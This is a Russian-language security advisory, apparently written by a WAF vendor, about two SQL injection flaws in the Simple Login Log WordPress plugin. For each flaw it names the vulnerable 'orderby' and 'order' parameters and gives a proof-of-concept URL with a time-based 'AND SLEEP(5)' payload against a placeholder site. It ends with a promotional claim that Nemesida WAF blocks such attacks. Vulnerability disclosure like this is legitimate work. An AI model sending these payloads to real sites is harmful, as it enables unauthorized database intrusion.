Множественные SQL инъекции в плагине Simple Login Log CMS WordPress
В плагине Simple Login Log для WordPress CMS были обнаружены многочисленные уязвимости.
По словам авторов, этот плагин ведет журнал входа пользователя в WordPress. Он предлагает фильтрацию пользователей и дат, а также функции экспорта собранной информации.
Согласно wordpress.org, он имеет более 20 000 активных установок.
Во время анализа безопасности было обнаружено две уязвимости SQL-инъекции в плагине Simple Login Log WordPress.
Примеры проведения SQL-инъекций:
- Функция:
$wpdb->get_results($sql, 'ARRAY_A')
- Уязвимый параметр:
$_REQUEST['orderby']
- URL:
http://vulnerablesite.com/wp-admin/users.php?page=login_log&orderby=1+AND+SLEEP%285%29
- Примечание: Приведенный пример URL-адреса сработает только в том случае, если в ответе SQL имеется несколько записей
- Файл: simple-login-log/simple-login-log.php
- Функция:
$wpdb->get_results($sql, 'ARRAY_A')
- Уязвимый параметр:
$_REQUEST['order']
- URL: http://vulnerablesite.com/wp-admin/users.php?page=login_log&orderby=time&order=AND+SLEEP%285%29
- Примечание: Приведенный пример URL-адреса сработает только в том случае, если в ответе SQL имеется несколько записей
- Файл: simple-login-log/simple-login-log.php
Такие атаки блокируются с помощью сигнатурного анализа. В случае обфускации пейлоада, запрос обрабатывается модулем искусственного интеллекта Nemesida WAF, распознающего аномалию в параметре запроса и позволяющему выявить эксплуатацию уязвимости.